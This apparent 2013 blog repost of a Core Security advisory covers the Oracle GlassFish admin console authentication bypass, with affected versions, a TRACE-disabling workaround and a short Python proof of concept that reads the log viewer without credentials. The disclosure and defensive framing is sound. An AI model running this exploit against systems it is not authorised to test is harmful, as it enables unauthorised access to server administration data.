Tuesday, March 5, 2013

Security Vulnerabilities: Oracle GlassFish Server Administration Console Authentication Bypass

Description: When the server is vulnerable to Oracle GlassFish Server Administration Console GET Request Authentication Bypass, it fails to enforce authentication on HTTP requests that contain lower case method names (e.g. ’get’). A remote, unauthenticated attacker could exploit this to upload and execute arbitrary code.


Vulnerable packages:    Oracle GlassFish Server 3.0.1
    Sun GlassFish Enterprise Server 2.1.1

Non-vulnerable packages:    Oracle GlassFish Server 3.1
    Contact Oracle for patches for other GlassFish versions

Work around suggested by Core Security [1]:

For users who cannot upgrade to the latest patched version, the following workaround can be applied in order to avoid this flaw:
  1. In the GlassFish Admin Console, go to the Tasks tree.
  2. Navigate through: Network Config > Protocols > admin-listener > HTTP.
  3. There is a checkbox "Trace: Enable TRACE operation" (checked by default); uncheck it and then save changes.
  4. Finally, restart GlassFish by doing C:\glassfishv3\bin>asadmin restart-domain
Check the availability:

Nessus Scanner can be used to check the availability of the vulnerability


The following Python code published by Core Security is a Proof-of-Concept of the vulnerability; it will retrieve the content of the Log Viewer effectively bypassing the authentication [1]:

import sys
import httplib

def make_trace_request(host, port, selector):

    print '[*] TRACE request: %s' % selector
    headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
                'Host': '%s:%s' % (host, port),
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'en-us,en;q=0.5',
                'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
                'Accept-Encoding': 'gzip,deflate',
                'Connection': 'close',
                'Referer': 'http://%s:%s%s' % (host, port, selector)}

    conn = httplib.HTTPConnection(host, port)
    conn.request('TRACE', selector, headers=headers)
    response = conn.getresponse()
    conn.close()

    print response.status, response.reason
    print response.getheaders()
    print response.read()

if len(sys.argv) != 3:
    print "Usage: $ python poc.py \nE.g:   $ python poc.py 192.168.0.1 4848"
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')


Reference

[1] Source: http://www.coresecurity.com/content/oracle-glassfish-server-administration-console-authentication-bypass
[2] http://www.securityfocus.com/archive/1/517965/30/0/threaded

0 comments: